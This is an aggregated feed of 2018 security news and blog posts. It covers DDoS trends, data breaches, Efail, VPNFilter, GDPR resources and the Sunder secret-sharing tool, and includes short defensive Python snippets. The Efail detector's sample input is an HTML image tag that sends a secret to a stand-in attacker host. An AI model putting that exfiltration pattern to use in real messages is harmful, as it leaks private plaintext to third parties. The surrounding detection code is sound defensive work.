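    """packets: iterable of (src_ip, protocol) tuples seen in one window.
    Returns the (src_ip, protocol) pairs whose count exceeds the threshold."""
    counts = Counter(packets)
    return {key for key, n in counts.items() if n > threshold}

# Simulated window: one source sends far more UDP than everyone else.
window = [("203.0.113.9", "UDP")] * 1500 + [("198.51.100.2", "TCP_SYN")] * 40
print(flag_floods(window))  # {('203.0.113.9', 'UDP')}
```

Real mitigations are far more sophisticated (amplification vectors, spoofed sources, and invalid packets defeat simple counting), but the per-vector classification step is why reports can break attacks down into UDP floods, TCP floods, and so on.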

Key DDoS Trends and Observations:

  • Fifty percent of DDoS attacks were User Datagram Protocol (UDP) floods.

  • TCP-based attacks were the second most common attack vector, making up 26 percent of attack types in the quarter.

  • Fifty-eight percent of DDoS attacks mitigated by Verisign in Q1 2018 employed multiple attack types.

  • The Financial industry, representing 57 percent of mitigation activity, was the most frequently targeted industry for Q1 2018. The IT/Cloud/SaaS industry experienced the second highest number of DDoS attacks, representing 26 percent of mitigation activity, followed by the Telecom industry, representing 17 percent of mitigation activity.

Selecting the Right DDoS Mitigation Strategy for Your Organization

As DDoS attacks remain a viable and unpredictable threat, how does your company determine the best mitigation strategy (or strategies) for protecting your online assets? Whatever your organization’s downtime tolerance, staff readiness, and technical expertise, selecting a DDoS solution that accommodates a variety of mitigation strategies is paramount to getting the protection (and value) you deserve.

Read the report to learn more about DDoS mitigation strategies.

For more DDoS Trends in Q1 2018, download the full report, and be sure to check back in a few months when we release our Q2 2018 DDoS Trends Report.

The post Q1 2018 DDoS Trends Report: 58 Percent of Attacks Employed Multiple Attack Types appeared first on Verisign Blog.

SN 669: Cellular Location Privacy

This week we examine some new side-channel worries and vulnerabilities, did Mandiant "hack back" on China?, more trouble with browsers, the big Google Firebase mess, sharing a bit of my dead system resurrection, and a look at the recent Supreme Court decision addressing cellular location privacy.

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.


Keep it tight at the back: why the World Cup reminds us to give defenders credit

The World Cup’s in full flow and we don’t have to look hard to find parallels with security. We’ve seen flashy attackers pitted against dogged defenders. The sport has even managed to bring technology into the mix at Russia 2018 courtesy of the video-assisted referee (VAR).

In football, attackers are the ones you see on the highlights packages. A moment of skill – or luck – is a lot easier to capture on camera. It’s the same in security. Think of the praise heaped upon pen testers and external hackers when they score wins against vulnerable organisations.

Last line of defence

We think defenders don’t get the credit they deserve – in football or in security. The business of organising a defence is less glamorous and doesn’t easily lend itself to highlights reels. It takes hours of practice on the training ground to work on coordinating at the back, to limit the openings for attackers to strike. But as any football fan knows, a good defence’s contribution is at least as valuable to an organisation’s goals as the players at the other end of the pitch. And in truth, the teams that have done well in previous World Cups have had a strong defensive lynchpin and a reliable keeper. (Think Cannavaro and Buffon in Italy’s 2006 winning team, or the Puyol-Casillas combination for Spain four years later.)

Global risks

Football is a global game, and this summer’s tournament reminds us that attacks can come from anywhere in the world. An unfortunate Moroccan defender’s stray header into his own net gifted a last-minute victory for Iran (while giving Spain and Portugal something to worry about in the process). It shows that an opponent just needs to be lucky once, but defences need to be on guard all the time.

Spreading the word

The World Cup is also a great opportunity to spread the security message among staff in an organisation. Crunch matches are happening during working hours, with the risk that distracted workers might be less vigilant to threats. Recent history has shown that large-scale sporting occasions bring scammers out of the woodwork in huge numbers, so now’s a good time to strike with a reminder about phishing risks.

Let’s not forget about the risk of data breaches. The England World Cup camp unwittingly provided some fodder for data protection and security awareness campaigns last week. It was embarrassment all round after a photographer snapped what appeared to be the team lineup for the Panama match. To make matters worse, the accidental photo went public despite some impressive defences. The London Independent reported that “England’s training base is surrounded by three-metre screens to stop opponents spying on training and reporters are asked to leave after 15 minutes of open sessions”.

The lesson here is that security professionals need to cover all angles. What happens on the pitch – or in the public eye – is just one aspect of what an organisation does. With so many angles to cover, security professionals, like their footballing counterparts, need to keep their eye on the ball.

 

The post Keep it tight at the back: why the World Cup reminds us to give defenders credit appeared first on BH Consulting.

SN 668: Lazy FPU State Restore

This week we examine a rather "mega" patch Tuesday, a nifty hack of Win10's Cortana, Microsoft's official "when do we patch" guidelines, the continuing tweaking of web browser behavior for our sanity, a widespread Windows 10 rootkit, the resurgence of the Satori IoT botnet, clipboard monitoring malware, a forthcoming change in Chrome's extensions policy, hacking apparent download counts on the Android store, some miscellany, an update on the status of Spectre & Meltdown... and yes, yet another brand new speculative execution vulnerability our OSes will be needing to patch against.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.


Olympic hackers may be attacking chemical warfare prevention labs

The team behind the 2018 Winter Olympics hack is still active, according to security researchers -- in fact, it's switching to more serious targets. Kaspersky has discovered that the group, nicknamed Olympic Destroyer, has been launching email phishing attacks against biochemical warfare prevention labs in Europe and Ukraine as well as financial organizations in Russia. The methodology is extremely familiar, including the same rogue macros embedded in decoy documents as well as extensive efforts to avoid typical detection methods.

Via: Wired

Source: Securelist

Fraudster caught using OPM hack data from 2015

Way back in 2015, the US Office of Personnel Management (OPM) was electronically burgled, with hackers making off with 21.5 million records. That data included social security numbers, fingerprints, usernames, passwords and data from interviews conducted for background checks. Now, a woman from Maryland has admitted to using data from that breach to secure fraudulent loans through a credit union.

Via: Reuters

Source: Department of Justice

How branding gives your security awareness messages extra strength

Many security professionals probably give little thought to branding; they prefer to leave that fluffy stuff to the marketing team. But when it comes to security awareness, branding can add a touch of goodness to your efforts. (And if you want to know what this has to do with creamy pints of the black stuff, read on.)

Leave aside your feelings about the term ‘branding’. For our purposes, it just means coming up with a name and a design, and then applying that same look and feel consistently and repeatedly across all your security initiatives – whether that’s phishing training, ransomware alerts, password hints and tips, or policy documents. You can also apply the brand regardless of whether the message appears in an email newsletter, posted on the office noticeboard, or on key rings. It’s a way to identify a link between messages, so your audience knows they come from the same source.

Why are consistency and repetition important? Research tells us that repetition plays a huge part in embedding learning and persuading an audience (thanks science!). The psychologist Robert Zajonc developed the concept of the ‘mere-exposure effect’. This means that repeating a message makes people familiar with it, and, over time, they become positively disposed towards it. Experts believe people need exposure to a message from six to 20 times for it to become effective.

Reuse and recycle

The good news is, you don’t have to be an advertising guru to develop a simple, effective brand for your security awareness programme. For a start, you can use material you’ve already got. Even if your business is relatively small, it will probably have a logo with a chosen colour scheme and font. Use them!

Larger organisations may even have more formal brand guidelines that you can use when developing your own materials. Now’s not the time to reinvent the wheel. Reusing or refreshing existing material (and corporate colours) helps to keep your costs down. It also reinforces your security brand because you’re subliminally linking your efforts to the company’s goals.

Designed to engage people

Design is where you can let your imagination run riot. If you don’t fancy your artistic abilities, take the opportunity to involve others in the company. You could tap into people’s creativity by offering an incentive to design the logo. In some of my previous roles, I created a competition with a €50 voucher as a prize for the winning design. It was a really effective way to start engaging people even before the awareness programme began. And engagement is, ultimately, what this is all about: capturing interest and attention. Always remember you’re trying to reach a very broad audience. The IT team should be on board anyway. You’re aiming for everyone in the organisation from the receptionist to the CEO.

Another word on design. Obviously, you may instinctively think of an image or icon that relates to security. (Full disclosure: personally, I’m not a fan of padlocks. Aside from being clichéd by now, a padlock has negative connotations. If you’re going to the trouble of branding security awareness efforts, it should promote a positive message about security.)

The medium is the message

And speaking of positive messages, a tagline can help to reinforce the behaviour and culture that you want to encourage. In several organisations, I’ve reused the phrase ‘be vigilant, be safe, be secure’. I included it on any emails I sent, and on all other printed and online materials relating to security awareness.

I put a lot of thought into the words, even down to the order they appear in. It’s got a certain internal rhythm to it, which makes it easier to recall. It’s framed as a positive message, rather than ‘don’t do this behaviour’. The words tell the reader what I wanted them to do: to remember to watch out for bad stuff, and to take care to protect themselves. Only at the end do I introduce the notion of security, which is something that arguably matters to the company more than motivating the end user. (The subject of motivation is worth a blog by itself, and I’ll come back to this subject in a future post.)

The beauty about security awareness is that it needs relatively little investment to deliver a potentially large return. You can keep your costs low by using materials already in the public domain or within your own company. Why not reach out to your marketing team and see if they can help? There’s no shortage of websites and blogs (ahem) with useful free security tips. For example, ENISA’s website has free-for-use awareness material including video clips, posters, illustrations and screen savers. If your efforts are more focused on privacy, try the UK ICO’s Think Privacy website, which shares best practice on awareness-raising programmes.

Security is good for you

Branding’s power can reach far beyond the product it’s trying to sell. Think of Guinness and how hordes of tourists depart from Dublin with clothes promoting a product many of them don’t even like! Now that’s the power of marketing. Why not harness some of that good stuff to give your security awareness extra strength?

 

The post How branding gives your security awareness messages extra strength appeared first on BH Consulting.

Cortana can be used to hack Windows 10 PCs

Cortana might be super helpful at keeping track of your shopping lists, but it turns out it's not so great at keeping your PC secure. Researchers from McAfee have discovered that by activating Cortana on a locked Windows 10 machine, you can trick it into opening up a contextual menu which can then be used for code execution. This could deploy malicious software, or even reset a Windows account password.

Via: The Verge

Source: McAfee

Major UK electrical retailer Dixons Carphone confirms it was hacked

One of Europe's largest electrical retailers has been the subject of a cyber attack that's compromised more than 5.9 million card records. Dixons Carphone, the owner of Currys PC World and Dixons Travel stores, says that most of these cards have chip and pin protection and noted that the data accessed doesn't include PIN numbers, card verification values (CVV) or any authentication data "enabling cardholder identification or a purchase to be made." However, some 105,000 cards were from non-EU countries and do not have the chip and pin feature.

Source: Dixons Carphone [pdf]

SN 667: Zippity Do… or Don’t

This week we update again on VPNFilter, look at another new emerging threat, check in on Drupalgeddon2, examine a very troubling remote Android vulnerability under active wormable exploitation, take stock of Cisco's multiple firmware backdoors, look at a new cryptomining strategy, the evolution of Russian state-sponsored cybercrime, a genealogy service that lost its user database, ongoing Russian censorship, another Adobe FLASH mess, and a check-in on how Marcus Hutchins is doing. Then we look at yet another huge mess resulting from insecure interpreters.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.


UK privacy watchdog slaps Yahoo with another fine over 2014 hack

Yahoo still isn't done facing the consequences for its handling of a massive 2014 data breach. The UK's Information Commissioner's Office has slapped Yahoo UK Services Ltd with a £250,000 (about $334,300) fine under the country's Data Protection Act. The ICO determined that Yahoo didn't take "appropriate" steps to protect the data of 515,121 UK users against hacks, including meeting protection standards and monitoring the credentials of staff with access to the information.

Source: ICO

Security newsround: June 2018

We round up reporting and research from across the web about the latest security news and developments. This month: help at hand for GDPR laggards, try and efail, biometrics blues, and calls for a router reboot as VPNFilter strikes.

Good data protection resources (see what we did there?)

Despite a very well flagged two-year countdown towards GDPR, the eleventh-hour scramble suggests many organisations were still unprepared. And let’s not forget that May 25 wasn’t a deadline but the start of an ongoing compliance process. Fortunately, there are some excellent resources to help, and we’ve rounded them up here.

This blog from Ireland’s deputy data protection commissioner debunks the widely – and wrongly – held theory of a bedding-in period before enforcement. The post also clarifies how organisations can mitigate the potential consequences of non-compliance with GDPR. Meanwhile the Irish Data Protection Bill passed a vote in the Dail in time for the regulation. You can read the bill in full, if that’s your thing, by clicking here.

In the UK, the Information Commissioner’s Office has produced in-depth guidance on consent for processing information. Specifically, when to apply consent and when to look for alternatives. (Plug: our COO Valerie Lyons wrote a fine blog on the very same subject here.) Together with the National Cyber Security Centre, the ICO also developed guidance to describe a set of technical security outcomes that are considered to represent appropriate measures under the GDPR.

The European Data Protection Board (EDPB), formerly known as the Article 29 Working Party, was quickly into action after 25 May. It published guidelines (PDF) on certification mechanisms under the regulation. This establishes the rules by which certification can take place, as proof of compliance with GDPR.

Finally, for an interesting US perspective on the regulation, here’s AlienVault CISO John McLeod. “Every company should prepare for “Right to be Forgotten” requests, which could present operational and compliance issues,” he said.

Do the hack-a

World Rugby suffered a data breach which saw attackers obtain personal details of thousands of subscribers. The data included first names, email addresses and encrypted passwords of users including players, coaches and parents worldwide. The Sunday Telegraph broke the story, with an interesting take on the news. The breach may have been a random incident but it’s also possible it was a targeted attack. Potential culprits might be one of the groups that previously leaked information from sporting bodies like WADA and the IAAF. Rugby’s governing body discovered the incident in early May, and took down the affected website to conduct more examinations. World Rugby is based in Dublin, and as a result it informed the Data Protection Commissioner about the breach. How would you handle a breach on that scale? Read our 10 steps to better post-breach incident response.

Efail: an email encryption problem or a vulnerability disclosure problem?

A group of researchers in Germany recently published details of critical flaws in PGP/GPG and S/MIME email encryption. They warned that the vulnerabilities could decrypt previously encrypted emails, including sensitive messages sent in the past. Conforming to the security industry’s love of a catchy name (see also: Heartbleed, Shellshock), the researchers dubbed the flaw Efail.

It was the cue for urgent warnings from EFF.org among others, to stop using email encryption tools. As the researchers put it: “EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” The full technical research paper is here, while there’s a website with a Q&A here.
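The mechanism the researchers describe can be illustrated from the defensive side. This hypothetical Python sketch (the regex and function names are my own, not from the Efail paper or any mail client) scans an HTML email body for externally loaded resources, the channel Efail abuses, so a client could block or warn before rendering:

```python
# Hedged sketch of the defensive idea, not the exploit itself: find
# external resources (images, stylesheets) that an HTML email would
# fetch when rendered, since such requests can leak decrypted plaintext
# in their URLs. Regex and names are invented for illustration.
import re

EXTERNAL_RESOURCE = re.compile(
    r'(?:src|href|url\()\s*=?\s*["\']?(https?://[^"\'\s)>]+)', re.IGNORECASE
)

def find_external_loads(html: str):
    """Return the external URLs the HTML would fetch when rendered."""
    return EXTERNAL_RESOURCE.findall(html)

body = '<img src="http://attacker.example/steal?d=SECRET"><p>hi</p>'
print(find_external_loads(body))  # ['http://attacker.example/steal?d=SECRET']
```

A real mail client needs proper HTML parsing rather than a regex, but the sketch shows why "don't auto-load remote content" was the immediate practical mitigation.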

As the story moved on, it emerged that the problem lay more with how some email clients rendered messages. Motherboard’s snarky but well-informed take quoted Johns Hopkins University cryptography professor Matthew Green. He described the exploit as “an extremely cool attack and kind of a masterpiece in exploiting bad crypto, combined with a whole lot of sloppiness on the part of mail client developers.” ProtonMail, the world’s largest secure email service, was scathing about the news. After performing a deep analysis, it said its own client was not vulnerable, nor was the PGP protocol broken.

So what are the big lessons from this story? Distraction is a risk in security: some security professionals may have rushed to react to Efail even if they didn’t need to. Curtis Franklin’s summary for Dark Reading observed that many enterprise IT teams have either moved away from PGP and S/MIME, or never used them. Noting the criticism of how the researchers published the vulnerabilities, Brian Honan wrote that ENISA, the European Union Agency for Network and Information Security, has published excellent good-practice guidance on vulnerability disclosure.

Biometrics blues as police recognition tech loses face

There was bad news for fans of dystopian sci-fi as police facial recognition systems for nabbing bad guys proved unreliable. The civil liberties group Big Brother Watch claimed the Metropolitan Police’s automated facial recognition technology misidentified innocent people as wanted criminals more than nine times out of ten. The group presented a report to the UK parliament about the technology’s shortcomings, among its findings the high false positive rate. Police forces have supported facial biometrics as a tool to help them combat crime, while privacy advocates described the technology’s use as “dangerously authoritarian”. As noted on our blog, this isn’t the first time a UK organisation has tried to introduce biometrics.

Router reboot alert

Malware called VPNFilter has infected 500,000 routers worldwide, and the net seems to be widening. Cisco Talos Intelligence researchers first revealed the malware, which hijacked devices in more than 54 countries but primarily in Ukraine. “The VPNFilter malware is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations,” the researchers said. VPNFilter can snoop on traffic, steal website credentials, monitor Modbus SCADA protocols, and has the capacity to damage or brick infected devices.

Sophos has a useful plain English summary of VPNFilter and what it can do. The malware affected products from a wide range of manufacturers, including Linksys, Netgear, MikroTik, QNAP and TP-Link. In a later update, Talos said some products from Asus, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE were also at risk. As the malware’s payload became apparent, the FBI advised router owners to reboot their devices. This story shows that it’s always worth checking your organisation’s current risk with a security assessment.

 

The post Security newsround: June 2018 appeared first on BH Consulting.

“You have all these silver bullets but not every threat is a werewolf”

Attendees at FutureScope got an insight into how cybersecurity threats have evolved from a technical concern to a business risk. Last week’s business networking conference in Dublin promised perspectives on emerging technologies – including how security affects our increasingly connected world.

BH Consulting founder Brian Honan spoke as part of a panel discussion with Damon Rands, CEO of Wolfberry CS. MC Karlin Lillington, technology columnist with the Irish Times, started by asking: “Are we overly worried or underprepared? Hyped into panic or not taking this seriously enough?”

Brian Honan said: “I think we’re living in an era where we’re reaping the seeds sown over the last few decades.” That partly stems from governments not grasping issues like protecting critical infrastructure, or businesses rapidly releasing products without considering security.

Hype vs hygiene: figuring out security priorities

Hype from security product makers has also played a part, Brian added. “It’s a perfect storm. Any time there’s a new vulnerability announced, it comes with its own website and its own PR campaign. We saw that with Shellshock and Heartbleed, yet in reality, none of our clients were attacked.” Referring to security vendors’ tendency to oversell their products’ capabilities, he said: “You have all these silver bullets, but not every security threat is a werewolf.”

It’s far more common to see organisations with poor security hygiene where they don’t update software patches regularly, or they don’t protect systems properly, Brian said. “For large organisations and most businesses, the risks you face are the standard threats. They include users clicking on links, poor passwords and unpatched systems. When we run security exercises against our clients, the first thing we target is not the IT infrastructure, it’s the people,” said Brian.

Damon Rands agreed. “90% of our work is reconfiguring what [systems] you’ve got already,” he said. At the same time, there are very real threats businesses need to protect against, he added.

Understanding cybersecurity threat types

Those threats vary by the type of businesses, said Brian. “If you’re a small business, the risk is of automated attacks like ransomware or computer viruses; kids and criminals looking for insecure systems. That’s at the base level. As you go up to large organisations with large amounts of data or intellectual property, you become a more targeted threat.”

Addressing the audience, Brian said most businesses shouldn’t think they face the same cybersecurity threats as nation states. “Not everybody in this room is a target for the NSA or GRU,” he said.

Damon Rands said Cyber Essentials is a framework of security controls that can help businesses to check for common risks. However, he pointed out that Cyber Essentials only focuses on technical security controls, not user behaviour and awareness. Growing numbers of businesses have adopted it recently and Rands said: “I believe that’s due to GDPR.”

Another evolution in cybersecurity predates GDPR, Brian added. When he founded BH Consulting in 2004, most of the people he spoke to were in technical roles. “Nowadays, we are being brought in by boards, audit committees and the C-suite who see security as a business risk,” he said.

This prompted Karlin Lillington to ask about how to pitch a technical security message to such a different audience. Brian said: “You have to treat it as another business risk. Very few businesses in the world would be efficient if they didn’t have their IT.”

The post “You have all these silver bullets but not every threat is a werewolf” appeared first on BH Consulting.

Ticketfly is finally back online after hack

Ticketfly's site is back online after a hack last week which forced the company to take the site down while it investigated the incident. The iOS app, along with the Promoter and Fanbase functions, are still down, as Ticketfly prioritized "bringing up the most critical parts of the platform first." It's also rolling out promoter and venue websites that the platform powers.

Source: Ticketfly

Atlanta ransomware attack may cost another $9.5 million to fix

The effects of the "SamSam" ransomware attack against Atlanta's government were much worse than it seemed at first glance. To start, city Information Management head Daphney Rackley revealed at a meeting that more than a third of Atlanta's 424 necessary programs were knocked offline or partly disabled, and close to 30 percent of those affected apps were "mission critical" -- that is, vital elements like the court system and police. The government initially reckoned that essential programs were safe.

Source: Reuters

‘WannaCry hero’ faces more federal malware charges

Marcus Hutchins, the cybersecurity researcher credited with helping stop last year's WannaCry ransomware, is facing four new charges related to malware he allegedly created to steal financial information. Now, the FBI says Hutchins lied about creating the malware called Kronos, and that he conspired with others to promote it online, including via YouTube.

Source: US District Court Eastern District of Wisconsin

SN 666: Certificate Transparency

This week we discuss yesterday's further good privacy news from Apple, the continuation of VPNFilter, an extremely clever web browser cross-site information leakage side-channel attack, Microsoft Research's fork of OpenVPN for security in a post-quantum world, Microsoft drops the ball on a 0-day remote code execution vulnerability in JScript, Valve finally patches a longstanding and very potent RCE vulnerability, Redis caching servers continue to be in serious trouble, a previously patched IE 0-day continues to find victims, Google's latest Chrome browser has removed support for HTTP public key pinning (HPKP), and... what is "Certificate Transparency" and why do we need it?

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.


MyHeritage admits 92 million user email addresses were leaked

MyHeritage is the latest company to suffer a security breach after a researcher found a file containing email addresses and hashed passwords for more than 92 million users. The researcher alerted MyHeritage to the breach Monday. The data includes account details for users who signed up to the genealogy and DNA testing service by October 26th last year.

Via: Motherboard

Source: MyHeritage

Ticketfly hacker stole more than 26 million email and home addresses

A hacker has leaked personal information for more than 26 million Ticketfly users after last week's data breach. That's according to Troy Hunt, the founder of Have I Been Pwned, which lets you check whether your email address has been included in various data breaches.

Source: Motherboard

Ticketfly says user data was compromised in recent hack

After it temporarily shut down its site Thursday, Ticketfly has confirmed it was hacked, and that the attackers compromised some client (i.e. venue) and customer data. The extent of the hack, and the types of data that the attackers accessed, is not yet known. Ticketfly is investigating the issue and has brought in third-party forensic experts to help it get back online. The company will give ticket buyers more information here as it becomes available.

Source: Ticketfly

Ticketfly temporarily shuts down to investigate ‘cyber incident’

It's not a great time to be a concertgoer. Ticketfly has temporarily shut down after a "cyber incident" (read: hack) compromised its systems. An intruder defaced the company's website around midnight on May 31st with claims that they had compromised the "backstage" database where festivals, promoters and venues manage their events. Billboard sources didn't believe this included credit card data, but the attacker had posted files supposedly linking to info for Ticketfly "members."

Source: Billboard

Attacker involved in 2014 Yahoo hack gets five years in prison

The hacker-for-hire involved in the 2014 Yahoo security breach that affected 500 million users has been sentenced to five years in prison. Karim Baratov aka Karim Taloverov aka Karim Akehmet Tokbergenov said he didn't know he was working for Russian spies, since he didn't research his customers. His name first came up when two Russian nationals were charged with orchestrating the Yahoo breach -- according to the DOJ, those nationals were the ones who gave him data from the breach, which he then used to hack into the email accounts of American and Russian journalists, government officials and employees of financial services and private businesses, as well as other persons of interest.

Source: DOJ, ABC News

The building blocks to a career in cybersecurity

Forging a career in cybersecurity is like building a house. Starting with a solid foundation makes it easier to build the layers on top. Now that I am a client-facing consultant performing ISO 27001 gap analyses and internal audits, it’s clear to me how my previous role in application support gave me a grounding in key elements of security.

Having this technical background under my belt prior to moving into cybersecurity was a big plus for me. It made me more confident in knowing exactly what I should look for when conducting an audit for a client. It also reinforced the importance of seeing evidence that an action has been carried out.

Technical background

My time with Hewlett-Packard Enterprise (HPE) taught me the fundamentals of computers and the basics of computer security needed to progress into my current consultant role. Having been a support manager for a major application that more than 8,000 engineers used, I quickly learned the importance of segregating environments. I helped to secure and improve development, testing, staging and production environments. I worked on solving issues such as capacity management, server access, allocating appropriate resources and stability issues.

In fact, many of my duties directly corresponded to a specific section of the ISO 27001 security standard. After investigating environment stability, I needed to order more resources to balance the development and staging environments with the testing environment servers in the VMs (A.12.1 of ISO 27001, which covers capacity management). Later, as the environments’ workload increased, I spec’d out and ordered more servers (A.14, covering system acquisition, development and maintenance).

All told, I gained experience in a broad range of areas, such as A.14.2 (security in development and support processes), A.13.1 (network security management), A.13.2 (information transfer), A.12.4 (logging and monitoring), and A.9.2 (user access management).

Applying experience to cybersecurity

Many people think of cybersecurity and think it’s all “IT” and “computers” – which was true for my desk-based job. However, as a consultant, it is abundantly clear we look for much more. It starts as soon as I walk through the client’s office door. Is someone manning the reception area when I arrive, or does someone escort me and tell me where to go? (Sometimes I ask to use a bathroom before meeting a client. Many times, someone told me where to go and I happily sauntered through the offices unescorted.)

Now, I’m looking out for weaknesses in physical security: a fire door left open, when the fire extinguishers were last serviced, an unlocked device with nobody standing at it, the all-too-familiar Post-it note with a username and password stuck to the side of the monitor or desk.

I spent my time before BH Consulting trying to get the prerequisites I would need to work in cybersecurity. Once I started working in the field, I realised how much of my knowledge I could easily apply. The nature of the work means constant change and the opportunity to keep building on that knowledge.

The post The building blocks to a career in cybersecurity appeared first on BH Consulting.

SN 665: VPNFilter

This week we discuss Oracle's planned end of serialization, Ghostery's GDPR faux pas, the emergence of a clever new banking Trojan, Amazon Echo and the case of the Fuzzy Match, more welcome movement from Mozilla, yet another steganographic hideout, an actual real-world appearance of HTTP Error 418 (I'm a Teapot!), the hype over Z-Wave's Z-Shave, and a deep dive into the half a million strong VPNFilter botnet.

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.


SN 664: SpectreNG Revealed

This week we examine the recent flaws discovered in the secure Signal messaging app for desktops, the rise in DNS router hijacking, another seriously flawed consumer router family, Microsoft Spectre patches for Win10's April 2018 feature update, the threat of voice assistant spoofing attacks, the evolving security of HTTP, still more new trouble with GPON routers, Facebook's Android app mistake, BMW's 14 security flaws and some fun miscellany. Then we examine the news of the next-generation of Spectre processor speculation flaws and what they mean for us.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.


In time for hacking season, the US has no cybersecurity coordinator

Picture the scene: John Bolton stands proudly against a backdrop of an American flag, smiling beneath his pruriently confrontative mustache, dusting his hands off as befits a man who's just completed a task of wistfully virile middle-management.

John Bolton just eradicated the White House positions (and people) who would stand between the United States and cyberattacks against our voting processes, our infrastructure and the tatters of our democracy. John Bolton grips his red stapler. John Bolton is in his happy place.

SN 663: Ultra-Clever Attacks

This week we will examine two incredibly clever, new (and bad) attacks named eFail and Throwhammer. But first we catch up on the rest of the past week's security and privacy news, including the evolution of UPnProxy, a worrisome flaw discovered in a very popular web development platform, the 1st anniversary of EternalBlue, the exploitation of those GPON routers, this week's disgusting security head shaker, a summary of the RSA conference's security practices survey, the appearance of persistent IoT malware, a significant misconception about hard drive failure, an interesting bit of listener feedback... then a look at two VERY clever new attacks.

We invite you to read the show notes!

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.


California teen phished his teachers to change grades

Phishing attacks have been a key part of some of the most high-profile hacks in recent years, but they're also used in smaller, less diabolical schemes as well. KTVU reports that a student at Ygnacio Valley High School in California used a phishing scam to access the school district's computer system and change a number of students' grades. He was arrested last week on 14 felony counts.

Via: Gizmodo

Meet Sunder, a New Way to Share Secrets

The moment a news organization is given access to highly sensitive materials—such as the Panama Papers, the NSA disclosures or the Drone Papers—the journalist and their source may be targeted by state and non-state actors, with the goal of preventing disclosures. How can whistleblowers and news organizations prepare for the worst?

The Freedom of the Press Foundation is requesting public comments and testing of a new open source tool that may help with this and similar use cases: Sunder, a desktop application for dividing access to secret information between multiple participants.

Sunder is not yet ready for high stakes use cases. It has not been audited and is alpha-quality software. We are looking for early community feedback, especially from media organizations, activists, and nonprofits.

While Sunder is a new tool that aims to make secret-sharing easy to use, the underlying cryptographic algorithm is far from novel: Shamir's Secret Sharing was developed in 1979 and has since found many applications in security tools. It divides a secret into parts, where a configurable number of parts is needed to reconstruct the secret. This enables the conditional delegation of access to sensitive information. The secret could be social media account credentials, or the passphrase to an encrypted thumb drive, or the private key used to log into a server.
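The core idea is small enough to sketch. This is a toy Python illustration of Shamir's scheme, assuming a small prime field chosen purely for demonstration; real tools such as the RustySecrets library that Sunder builds on use vetted implementations and proper secret encodings.

```python
# Toy sketch of Shamir's Secret Sharing: a secret becomes the constant term
# of a random polynomial of degree k-1; each share is a point on the curve,
# and any k points recover the polynomial (and so the secret) at x = 0.
import random

PRIME = 2**127 - 1  # a Mersenne prime, large enough for a 16-byte secret

def split(secret: int, n: int, k: int):
    """Split `secret` into n shares, any k of which reconstruct it."""
    coeffs = [secret] + [random.randrange(PRIME) for _ in range(k - 1)]
    def f(x):
        return sum(c * pow(x, i, PRIME) for i, c in enumerate(coeffs)) % PRIME
    return [(x, f(x)) for x in range(1, n + 1)]

def combine(shares):
    """Recover the secret by Lagrange interpolation at x = 0."""
    secret = 0
    for i, (xi, yi) in enumerate(shares):
        num, den = 1, 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (-xj) % PRIME
                den = den * (xi - xj) % PRIME
        # pow(den, PRIME - 2, PRIME) is the modular inverse of den.
        secret = (secret + yi * num * pow(den, PRIME - 2, PRIME)) % PRIME
    return secret
```

For example, `split(secret, 5, 3)` yields five shares of which any three reconstruct the secret, mirroring the configurable k-of-n quorums Sunder exposes. With fewer than k shares, the polynomial is undetermined and every candidate secret remains equally likely.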

Sunder is currently available for Mac and Linux, and in source code form. See the documentation for installation and usage instructions. We also invite you to complete a short survey which will influence the future direction of this tool.

If you are interested in getting involved in development, we welcome your contributions! Please especially take a look at issues marked "easy" or "docs". Sunder is based on the open source RustySecrets library, which is also open to new contributors.

Sunder allows you to divide a secret into shares, a certain number of which are required to reconstruct it


How could Sunder be useful for journalists, activists and whistleblowers?

Until a quorum of participants agrees to combine their shares (the number is configurable, e.g., 5 out of 8), the individual parts are not sufficient to gain access, even by brute force methods. This property makes it possible to use Sunder in cases where you want to disclose a secret only if certain conditions are met.

The most frequently cited example is disclosure upon an adverse event. Let's say an activist's work is threatened by powerful interests. She provides access to an encrypted hard drive that contains her research to multiple news organizations. Each receives a share of the passphrase, under the condition that they only combine the shares upon her arrest or death, and that they take precautions to protect the shares until then.

